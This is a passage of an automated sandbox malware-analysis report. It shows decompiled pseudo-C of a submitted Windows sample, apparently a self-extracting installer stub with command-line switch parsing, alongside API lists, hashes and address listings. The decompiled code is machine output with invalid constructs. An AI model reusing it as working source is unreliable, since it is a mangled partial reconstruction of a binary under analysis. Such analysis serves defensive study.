                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CharPrev
                              • String ID:
                              • API String ID: 122130370-0
                              • Opcode ID: 99d15d7dd2cda0125ad405cb54728ad63963f418fb58c05534599bd18e0841f9
                              • Instruction ID: 52a9c574dfb30ac1ac45ac093b18f9cd308b3aac4adde83bf9a93803f3918cd1
                              • Opcode Fuzzy Hash: 99d15d7dd2cda0125ad405cb54728ad63963f418fb58c05534599bd18e0841f9
                              • Instruction Fuzzy Hash: 59F04C331046509BD3324A1D9CC4B66BFDE9BC6350F28C16EE8DEC3205DA658C46A3A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A7621E() {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t5;
                              				void* _t9;
                              				void* _t13;
                              				void* _t19;
                              				void* _t20;
                              				signed int _t21;
                              
                              				_t5 =  *0xa78004; // 0x74742267
                              				_v8 = _t5 ^ _t21;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					0x4f0 = 2;
                              					_t9 = E00A7597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                              				} else {
                              					E00A744B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                              					 *0xa79124 = E00A76285();
                              					_t9 = 0;
                              				}
                              				return E00A76CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                              			}











                              0x00a76229
                              0x00a76230
                              0x00a76247
                              0x00a7626a
                              0x00a76272
                              0x00a76249
                              0x00a76255
                              0x00a7625f
                              0x00a76264
                              0x00a76264
                              0x00a76284

                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A7623F
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryErrorLastLoadMessageStringWindows
                              • String ID:
                              • API String ID: 381621628-0
                              • Opcode ID: 13379f334d2022d16fe1074e0215ccd186dd7f6bb56d39e4b1630d1d9f7065e8
                              • Instruction ID: 60b0b6ac39b6e3439cd94bc64d9dba5f3f9bc993cf04d986e3926b6cb38dc2ae
                              • Opcode Fuzzy Hash: 13379f334d2022d16fe1074e0215ccd186dd7f6bb56d39e4b1630d1d9f7065e8
                              • Instruction Fuzzy Hash: 79F0E9B0B00208ABE790EB748E06FFE33BCDB54300F40C46AB98ED6082DE749D858690
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74B60(signed int _a4) {
                              				signed int _t9;
                              				signed int _t15;
                              
                              				_t15 = _a4 * 0x18;
                              				if( *((intOrPtr*)(_t15 + 0xa78d64)) != 1) {
                              					_t9 = FindCloseChangeNotification( *(_t15 + 0xa78d74)); // executed
                              					if(_t9 == 0) {
                              						return _t9 | 0xffffffff;
                              					}
                              					 *((intOrPtr*)(_t15 + 0xa78d60)) = 1;
                              					return 0;
                              				}
                              				 *((intOrPtr*)(_t15 + 0xa78d60)) = 1;
                              				 *((intOrPtr*)(_t15 + 0xa78d68)) = 0;
                              				 *((intOrPtr*)(_t15 + 0xa78d70)) = 0;
                              				 *((intOrPtr*)(_t15 + 0xa78d6c)) = 0;
                              				return 0;
                              			}





                              0x00a74b66
                              0x00a74b74
                              0x00a74b98
                              0x00a74ba0
                              0x00000000
                              0x00a74bac
                              0x00a74ba4
                              0x00000000
                              0x00a74ba4
                              0x00a74b78
                              0x00a74b7e
                              0x00a74b84
                              0x00a74b8a
                              0x00000000

                              APIs
                              • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A74FA1,00000000), ref: 00A74B98
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: ChangeCloseFindNotification
                              • String ID:
                              • API String ID: 2591292051-0
                              • Opcode ID: 0631bee14517897260ab794f2a9b282cc97fc750ca87f04c9dfccb987ce13a36
                              • Instruction ID: c6ca6de70d0f2211681af4499060e2bf23cad70f64e4dc4f3a0d2df049eb2228
                              • Opcode Fuzzy Hash: 0631bee14517897260ab794f2a9b282cc97fc750ca87f04c9dfccb987ce13a36
                              • Instruction Fuzzy Hash: E7F01231780B089E5B71CF39CC18653BBE4AAE53A1710C92F946ED2192DB34AC41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A766AE(CHAR* __ecx) {
                              				unsigned int _t1;
                              
                              				_t1 = GetFileAttributesA(__ecx); // executed
                              				if(_t1 != 0xffffffff) {
                              					return  !(_t1 >> 4) & 0x00000001;
                              				} else {
                              					return 0;
                              				}
                              			}




                              0x00a766b1
                              0x00a766ba
                              0x00a766c7
                              0x00a766bc
                              0x00a766be
                              0x00a766be

                              APIs
                              • GetFileAttributesA.KERNELBASE(?,00A74777,?,00A74E38,?), ref: 00A766B1
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 2a4e68972e04b06452d8f174e2b3d1418be173ac5cbaf752e6d233eaa71522f4
                              • Instruction ID: a74105462a9022a37a9a069fd6a47131a681c7d4c884d5cb9a002b3217bd30c1
                              • Opcode Fuzzy Hash: 2a4e68972e04b06452d8f174e2b3d1418be173ac5cbaf752e6d233eaa71522f4
                              • Instruction Fuzzy Hash: 3AB09276222840526E2447716C2965A2A41B6D123A7E89B90F03AC01E0CA3EC887D004
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74CA0(long _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalAlloc(0, _a4); // executed
                              				return _t2;
                              			}




                              0x00a74caa
                              0x00a74cb1

                              APIs
                              • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A74CAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: AllocGlobal
                              • String ID:
                              • API String ID: 3761449716-0
                              • Opcode ID: 1d52b21ac84735ad1fdf708ecf8eaadcebb177f9bdb92d6eefcb6e44f960f8cc
                              • Instruction ID: 7aca0c8ec57748e0acd9aa1177179f113af3884b96bb8998aeed9f0c242a7811
                              • Opcode Fuzzy Hash: 1d52b21ac84735ad1fdf708ecf8eaadcebb177f9bdb92d6eefcb6e44f960f8cc
                              • Instruction Fuzzy Hash: 03B0123214420CB7CF001FC2EC09F893F5DF7C4761F144000F60C454508A7294528696
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A74CC0(void* _a4) {
                              				void* _t2;
                              
                              				_t2 = GlobalFree(_a4); // executed
                              				return _t2;
                              			}




                              0x00a74cc8
                              0x00a74ccf

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FreeGlobal
                              • String ID:
                              • API String ID: 2979337801-0
                              • Opcode ID: 1a86cd3589cd93edbbeaf32e83474d6c81b118a074b636502b51b916fbdbfb95
                              • Instruction ID: 5afc0293dc78e0d406de99696e558bf54265135bc59ddeb1fed96efa7f208220
                              • Opcode Fuzzy Hash: 1a86cd3589cd93edbbeaf32e83474d6c81b118a074b636502b51b916fbdbfb95
                              • Instruction Fuzzy Hash: 15B0123100010CBB8F001B82EC088493F1DD6C02607004010F50C414218B3398538585
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E00A75C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				signed int _v12;
                              				CHAR* _v265;
                              				char _v266;
                              				char _v267;
                              				char _v268;
                              				CHAR* _v272;
                              				char _v276;
                              				signed int _v296;
                              				char _v556;
                              				signed int _t61;
                              				int _t63;
                              				char _t67;
                              				CHAR* _t69;
                              				signed int _t71;
                              				void* _t75;
                              				char _t79;
                              				void* _t83;
                              				void* _t85;
                              				void* _t87;
                              				intOrPtr _t88;
                              				void* _t100;
                              				intOrPtr _t101;
                              				CHAR* _t104;
                              				intOrPtr _t105;
                              				void* _t111;
                              				void* _t115;
                              				CHAR* _t118;
                              				void* _t119;
                              				void* _t127;
                              				CHAR* _t129;
                              				void* _t132;
                              				void* _t142;
                              				signed int _t143;
                              				CHAR* _t144;
                              				void* _t145;
                              				void* _t146;
                              				void* _t147;
                              				void* _t149;
                              				char _t155;
                              				void* _t157;
                              				void* _t162;
                              				void* _t163;
                              				char _t167;
                              				char _t170;
                              				CHAR* _t173;
                              				void* _t177;
                              				intOrPtr* _t183;
                              				intOrPtr* _t192;
                              				CHAR* _t199;
                              				void* _t200;
                              				CHAR* _t201;
                              				void* _t205;
                              				void* _t206;
                              				int _t209;
                              				void* _t210;
                              				void* _t212;
                              				void* _t213;
                              				CHAR* _t218;
                              				intOrPtr* _t219;
                              				intOrPtr* _t220;
                              				signed int _t221;
                              				signed int _t223;
                              
                              				_t173 = __ecx;
                              				_t61 =  *0xa78004; // 0x74742267
                              				_v8 = _t61 ^ _t221;
                              				_push(__ebx);
                              				_push(__esi);
                              				_push(__edi);
                              				_t209 = 1;
                              				if(__ecx == 0 ||  *__ecx == 0) {
                              					_t63 = 1;
                              				} else {
                              					L2:
                              					while(_t209 != 0) {
                              						_t67 =  *_t173;
                              						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                              							_t173 = CharNextA(_t173);
                              							continue;
                              						}
                              						_v272 = _t173;
                              						if(_t67 == 0) {
                              							break;
                              						} else {
                              							_t69 = _v272;
                              							_t177 = 0;
                              							_t213 = 0;
                              							_t163 = 0;
                              							_t202 = 1;
                              							do {
                              								if(_t213 != 0) {
                              									if(_t163 != 0) {
                              										break;
                              									} else {
                              										goto L21;
                              									}
                              								} else {
                              									_t69 =  *_t69;
                              									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                              										break;
                              									} else {
                              										_t69 = _v272;
                              										L21:
                              										_t155 =  *_t69;
                              										if(_t155 != 0x22) {
                              											if(_t202 >= 0x104) {
                              												goto L106;
                              											} else {
                              												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                              												_t177 = _t177 + 1;
                              												_t202 = _t202 + 1;
                              												_t157 = 1;
                              												goto L30;
                              											}
                              										} else {
                              											if(_v272[1] == 0x22) {
                              												if(_t202 >= 0x104) {
                              													L106:
                              													_t63 = 0;
                              													L125:
                              													_pop(_t210);
                              													_pop(_t212);
                              													_pop(_t162);
                              													return E00A76CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                              												} else {
                              													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                              													_t177 = _t177 + 1;
                              													_t202 = _t202 + 1;
                              													_t157 = 2;
                              													goto L30;
                              												}
                              											} else {
                              												_t157 = 1;
                              												if(_t213 != 0) {
                              													_t163 = 1;
                              												} else {
                              													_t213 = 1;
                              												}
                              												goto L30;
                              											}
                              										}
                              									}
                              								}
                              								goto L131;
                              								L30:
                              								_v272 =  &(_v272[_t157]);
                              								_t69 = _v272;
                              							} while ( *_t69 != 0);
                              							if(_t177 >= 0x104) {
                              								E00A76E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                              								asm("int3");
                              								_push(_t221);
                              								_t222 = _t223;
                              								_t71 =  *0xa78004; // 0x74742267
                              								_v296 = _t71 ^ _t223;
                              								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                              									0x4f0 = 2;
                              									_t75 = E00A7597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                              								} else {
                              									E00A744B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                              									 *0xa79124 = E00A76285();
                              									_t75 = 0;
                              								}
                              								return E00A76CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                              							} else {
                              								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                              								if(_t213 == 0) {
                              									if(_t163 != 0) {
                              										goto L34;
                              									} else {
                              										goto L40;
                              									}
                              								} else {
                              									if(_t163 != 0) {
                              										L40:
                              										_t79 = _v268;
                              										if(_t79 == 0x2f || _t79 == 0x2d) {
                              											_t83 = CharUpperA(_v267) - 0x3f;
                              											if(_t83 == 0) {
                              												_t202 = 0x521;
                              												E00A744B9(0, 0x521, 0xa71140, 0, 0x40, 0);
                              												_t85 =  *0xa78588; // 0x0
                              												if(_t85 != 0) {
                              													CloseHandle(_t85);
                              												}
                              												ExitProcess(0);
                              											}
                              											_t87 = _t83 - 4;
                              											if(_t87 == 0) {
                              												if(_v266 != 0) {
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t167 = (0 | _v265 == 0x00000022) + 3;
                              														_t215 =  &_v268 + _t167;
                              														_t183 =  &_v268 + _t167;
                              														_t50 = _t183 + 1; // 0x1
                              														_t202 = _t50;
                              														do {
                              															_t88 =  *_t183;
                              															_t183 = _t183 + 1;
                              														} while (_t88 != 0);
                              														if(_t183 == _t202) {
                              															goto L49;
                              														} else {
                              															_t205 = 0x5b;
                              															if(E00A7667F(_t215, _t205) == 0) {
                              																L115:
                              																_t206 = 0x5d;
                              																if(E00A7667F(_t215, _t206) == 0) {
                              																	L117:
                              																	_t202 =  &_v276;
                              																	_v276 = _t167;
                              																	if(E00A75C17(_t215,  &_v276) == 0) {
                              																		goto L49;
                              																	} else {
                              																		_t202 = 0x104;
                              																		E00A71680(0xa78c42, 0x104, _v276 + _t167 +  &_v268);
                              																	}
                              																} else {
                              																	_t202 = 0x5b;
                              																	if(E00A7667F(_t215, _t202) == 0) {
                              																		goto L49;
                              																	} else {
                              																		goto L117;
                              																	}
                              																}
                              															} else {
                              																_t202 = 0x5d;
                              																if(E00A7667F(_t215, _t202) == 0) {
                              																	goto L49;
                              																} else {
                              																	goto L115;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													 *0xa78a24 = 1;
                              												}
                              												goto L50;
                              											} else {
                              												_t100 = _t87 - 1;
                              												if(_t100 == 0) {
                              													L98:
                              													if(_v266 != 0x3a) {
                              														goto L49;
                              													} else {
                              														_t170 = (0 | _v265 == 0x00000022) + 3;
                              														_t217 =  &_v268 + _t170;
                              														_t192 =  &_v268 + _t170;
                              														_t38 = _t192 + 1; // 0x1
                              														_t202 = _t38;
                              														do {
                              															_t101 =  *_t192;
                              															_t192 = _t192 + 1;
                              														} while (_t101 != 0);
                              														if(_t192 == _t202) {
                              															goto L49;
                              														} else {
                              															_t202 =  &_v276;
                              															_v276 = _t170;
                              															if(E00A75C17(_t217,  &_v276) == 0) {
                              																goto L49;
                              															} else {
                              																_t104 = CharUpperA(_v267);
                              																_t218 = 0xa78b3e;
                              																_t105 = _v276;
                              																if(_t104 != 0x54) {
                              																	_t218 = 0xa78a3a;
                              																}
                              																E00A71680(_t218, 0x104, _t105 + _t170 +  &_v268);
                              																_t202 = 0x104;
                              																E00A7658A(_t218, 0x104, 0xa71140);
                              																if(E00A731E0(_t218) != 0) {
                              																	goto L50;
                              																} else {
                              																	goto L106;
                              																}
                              															}
                              														}
                              													}
                              												} else {
                              													_t111 = _t100 - 0xa;
                              													if(_t111 == 0) {
                              														if(_v266 != 0) {
                              															if(_v266 != 0x3a) {
                              																goto L49;
                              															} else {
                              																_t199 = _v265;
                              																if(_t199 != 0) {
                              																	_t219 =  &_v265;
                              																	do {
                              																		_t219 = _t219 + 1;
                              																		_t115 = CharUpperA(_t199) - 0x45;
                              																		if(_t115 == 0) {
                              																			 *0xa78a2c = 1;
                              																		} else {
                              																			_t200 = 2;
                              																			_t119 = _t115 - _t200;
                              																			if(_t119 == 0) {
                              																				 *0xa78a30 = 1;
                              																			} else {
                              																				if(_t119 == 0xf) {
                              																					 *0xa78a34 = 1;
                              																				} else {
                              																					_t209 = 0;
                              																				}
                              																			}
                              																		}
                              																		_t118 =  *_t219;
                              																		_t199 = _t118;
                              																	} while (_t118 != 0);
                              																}
                              															}
                              														} else {
                              															 *0xa78a2c = 1;
                              														}
                              														goto L50;
                              													} else {
                              														_t127 = _t111 - 3;
                              														if(_t127 == 0) {
                              															if(_v266 != 0) {
                              																if(_v266 != 0x3a) {
                              																	goto L49;
                              																} else {
                              																	_t129 = CharUpperA(_v265);
                              																	if(_t129 == 0x31) {
                              																		goto L76;
                              																	} else {
                              																		if(_t129 == 0x41) {
                              																			goto L83;
                              																		} else {
                              																			if(_t129 == 0x55) {
                              																				goto L76;
                              																			} else {
                              																				goto L49;
                              																			}
                              																		}
                              																	}
                              																}
                              															} else {
                              																L76:
                              																_push(2);
                              																_pop(1);
                              																L83:
                              																 *0xa78a38 = 1;
                              															}
                              															goto L50;
                              														} else {
                              															_t132 = _t127 - 1;
                              															if(_t132 == 0) {
                              																if(_v266 != 0) {
                              																	if(_v266 != 0x3a) {
                              																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                              																			goto L49;
                              																		}
                              																	} else {
                              																		_t201 = _v265;
                              																		 *0xa79a2c = 1;
                              																		if(_t201 != 0) {
                              																			_t220 =  &_v265;
                              																			do {
                              																				_t220 = _t220 + 1;
                              																				_t142 = CharUpperA(_t201) - 0x41;
                              																				if(_t142 == 0) {
                              																					_t143 = 2;
                              																					 *0xa79a2c =  *0xa79a2c | _t143;
                              																					goto L70;
                              																				} else {
                              																					_t145 = _t142 - 3;
                              																					if(_t145 == 0) {
                              																						 *0xa78d48 =  *0xa78d48 | 0x00000040;
                              																					} else {
                              																						_t146 = _t145 - 5;
                              																						if(_t146 == 0) {
                              																							 *0xa79a2c =  *0xa79a2c & 0xfffffffd;
                              																							goto L70;
                              																						} else {
                              																							_t147 = _t146 - 5;
                              																							if(_t147 == 0) {
                              																								 *0xa79a2c =  *0xa79a2c & 0xfffffffe;
                              																								goto L70;
                              																							} else {
                              																								_t149 = _t147;
                              																								if(_t149 == 0) {
                              																									 *0xa78d48 =  *0xa78d48 | 0x00000080;
                              																								} else {
                              																									if(_t149 == 3) {
                              																										 *0xa79a2c =  *0xa79a2c | 0x00000004;
                              																										L70:
                              																										 *0xa78a28 = 1;
                              																									} else {
                              																										_t209 = 0;
                              																									}
                              																								}
                              																							}
                              																						}
                              																					}
                              																				}
                              																				_t144 =  *_t220;
                              																				_t201 = _t144;
                              																			} while (_t144 != 0);
                              																		}
                              																	}
                              																} else {
                              																	 *0xa79a2c = 3;
                              																	 *0xa78a28 = 1;
                              																}
                              																goto L50;
                              															} else {
                              																if(_t132 == 0) {
                              																	goto L98;
                              																} else {
                              																	L49:
                              																	_t209 = 0;
                              																	L50:
                              																	_t173 = _v272;
                              																	if( *_t173 != 0) {
                              																		goto L2;
                              																	} else {
                              																		break;
                              																	}
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              										} else {
                              											goto L106;
                              										}
                              									} else {
                              										L34:
                              										_t209 = 0;
                              										break;
                              									}
                              								}
                              							}
                              						}
                              						goto L131;
                              					}
                              					if( *0xa78a2c != 0 &&  *0xa78b3e == 0) {
                              						if(GetModuleFileNameA( *0xa79a3c, 0xa78b3e, 0x104) == 0) {
                              							_t209 = 0;
                              						} else {
                              							_t202 = 0x5c;
                              							 *((char*)(E00A766C8(0xa78b3e, _t202) + 1)) = 0;
                              						}
                              					}
                              					_t63 = _t209;
                              				}
                              				L131:
                              			}


































































                              0x00a75c9e
                              0x00a75ca9
                              0x00a75cb0
                              0x00a75cb3
                              0x00a75cb6
                              0x00a75cb7
                              0x00a75cb8
                              0x00a75cbd
                              0x00a76204
                              0x00a75ccb
                              0x00000000
                              0x00a75ccb
                              0x00a75cd3
                              0x00a75cd7
                              0x00a75cf4
                              0x00000000
                              0x00a75cf4
                              0x00a75cf8
                              0x00a75d00
                              0x00000000
                              0x00a75d06
                              0x00a75d06
                              0x00a75d0e
                              0x00a75d10
                              0x00a75d12
                              0x00a75d14
                              0x00a75d15
                              0x00a75d17
                              0x00a75d49
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a75d19
                              0x00a75d19
                              0x00a75d1d
                              0x00000000
                              0x00a75d3f
                              0x00a75d3f
                              0x00a75d4b
                              0x00a75d4b
                              0x00a75d4f
                              0x00a75d8d
                              0x00000000
                              0x00a75d93
                              0x00a75d93
                              0x00a75d9a
                              0x00a75d9d
                              0x00a75d9e
                              0x00000000
                              0x00a75d9e
                              0x00a75d51
                              0x00a75d5b
                              0x00a75d72
                              0x00a760fb
                              0x00a760fb
                              0x00a76207
                              0x00a7620a
                              0x00a7620b
                              0x00a7620e
                              0x00a76217
                              0x00a75d78
                              0x00a75d78
                              0x00a75d80
                              0x00a75d83
                              0x00a75d84
                              0x00000000
                              0x00a75d84
                              0x00a75d5d
                              0x00a75d5f
                              0x00a75d62
                              0x00a75d68
                              0x00a75d64
                              0x00a75d64
                              0x00a75d64
                              0x00000000
                              0x00a75d62
                              0x00a75d5b
                              0x00a75d4f
                              0x00a75d1d
                              0x00000000
                              0x00a75d9f
                              0x00a75d9f
                              0x00a75da5
                              0x00a75dab
                              0x00a75dba
                              0x00a76218
                              0x00a7621d
                              0x00a76220
                              0x00a76221
                              0x00a76229
                              0x00a76230
                              0x00a76247
                              0x00a7626a
                              0x00a76272
                              0x00a76249
                              0x00a76255
                              0x00a7625f
                              0x00a76264
                              0x00a76264
                              0x00a76284
                              0x00a75dc0
                              0x00a75dc0
                              0x00a75dca
                              0x00a75e22
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a75dcc
                              0x00a75dce
                              0x00a75e24
                              0x00a75e24
                              0x00a75e2c
                              0x00a75e47
                              0x00a75e4a
                              0x00a761d2
                              0x00a761e2
                              0x00a761e7
                              0x00a761ee
                              0x00a761f1
                              0x00a761f1
                              0x00a761f8
                              0x00a761f8
                              0x00a75e50
                              0x00a75e53
                              0x00a76109
                              0x00a7611f
                              0x00000000
                              0x00a76125
                              0x00a76137
                              0x00a7613a
                              0x00a7613c
                              0x00a7613e
                              0x00a7613e
                              0x00a76141
                              0x00a76141
                              0x00a76143
                              0x00a76144
                              0x00a7614a
                              0x00000000
                              0x00a76150
                              0x00a76152
                              0x00a7615c
                              0x00a76170
                              0x00a76172
                              0x00a7617c
                              0x00a76190
                              0x00a76190
                              0x00a76196
                              0x00a761a5
                              0x00000000
                              0x00a761ab
                              0x00a761b9
                              0x00a761c6
                              0x00a761c6
                              0x00a7617e
                              0x00a76180
                              0x00a7618a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7618a
                              0x00a7615e
                              0x00a76160
                              0x00a7616a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a7616a
                              0x00a7615c
                              0x00a7614a
                              0x00a7610b
                              0x00a7610e
                              0x00a7610e
                              0x00000000
                              0x00a75e59
                              0x00a75e59
                              0x00a75e5c
                              0x00a7604f
                              0x00a76056
                              0x00000000
                              0x00a7605c
                              0x00a7606e
                              0x00a76071
                              0x00a76073
                              0x00a76075
                              0x00a76075
                              0x00a76078
                              0x00a76078
                              0x00a7607a
                              0x00a7607b
                              0x00a76081
                              0x00000000
                              0x00a76087
                              0x00a76087
                              0x00a7608d
                              0x00a7609c
                              0x00000000
                              0x00a760a2
                              0x00a760aa
                              0x00a760b2
                              0x00a760b7
                              0x00a760bd
                              0x00a760bf
                              0x00a760bf
                              0x00a760d6
                              0x00a760e0
                              0x00a760e7
                              0x00a760f5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00a760f5
                              0x00a7609c
                              0x00a76081
                              0x00a75e62
                              0x00a75e62
                              0x00a75e65
                              0x00a75fd3
                              0x00a75fe9
                              0x00000000
                              0x00a75fef
                              0x00a75fef
                              0x00a75ff7
                              0x00a75ffd
                              0x00a76003
                              0x00a76006
                              0x00a76011
                              0x00a76014
                              0x00a7603d
                              0x00a76016
                              0x00a76018
                              0x00a76019
                              0x00a7601b
                              0x00a76033
                              0x00a7601d
                              0x00a76020
                              0x00a76029
                              0x00a76022
                              0x00a76022
                              0x00a76022
                              0x00a76020
                              0x00a7601b
                              0x00a76042
                              0x00a76044
                              0x00a76046
                              0x00a7604a
                              0x00a75ff7
                              0x00a75fd5
                              0x00a75fd8
                              0x00a75fd8
                              0x00000000
                              0x00a75e6b
                              0x00a75e6b
                              0x00a75e6e
                              0x00a75f8b
                              0x00a75f99
                              0x00000000
                              0x00a75f9f
                              0x00a75fa7
                              0x00a75faf
                              0x00000000
                              0x00a75fb1
                              0x00a75fb3
                              0x00000000
                              0x00a75fb5
                              0x00a75fb7
                              0x00000000
                              0x00a75fb9
                              0x00000000
                              0x00a75fb9
                              0x00a75fb7
                              0x00a75fb3
                              0x00a75faf
                              0x00a75f8d
                              0x00a75f8d
                              0x00a75f8d
                              0x00a75f8f
                              0x00a75fc1
                              0x00a75fc1
                              0x00a75fc1
                              0x00000000
                              0x00a75e74
                              0x00a75e74
                              0x00a75e77
                              0x00a75ea0
                              0x00a75ebd
                              0x00a75f79
                              0x00000000
                              0x00a75f7f
                              0x00a75ec3
                              0x00a75ec3
                              0x00a75ecc
                              0x00a75ed4
                              0x00a75ed6
                              0x00a75edc
                              0x00a75edf
                              0x00a75eea
                              0x00a75eed
                              0x00a75f3f
                              0x00a75f40
                              0x00000000
                              0x00a75eef
                              0x00a75eef
                              0x00a75ef2
                              0x00a75f34
                              0x00a75ef4
                              0x00a75ef4
                              0x00a75ef7
                              0x00a75f2b
                              0x00000000
                              0x00a75ef9
                              0x00a75ef9
                              0x00a75efc
                              0x00a75f22
                              0x00000000
                              0x00a75efe
                              0x00a75eff
                              0x00a75f02
                              0x00a75f16
                              0x00a75f04
                              0x00a75f07
                              0x00a75f0d
                              0x00a75f46
                              0x00a75f46
                              0x00a75f09
                              0x00a75f09
                              0x00a75f09
                              0x00a75f07
                              0x00a75f02
                              0x00a75efc
                              0x00a75ef7
                              0x00a75ef2
                              0x00a75f4c
                              0x00a75f4e
                              0x00a75f50
                              0x00a75f54
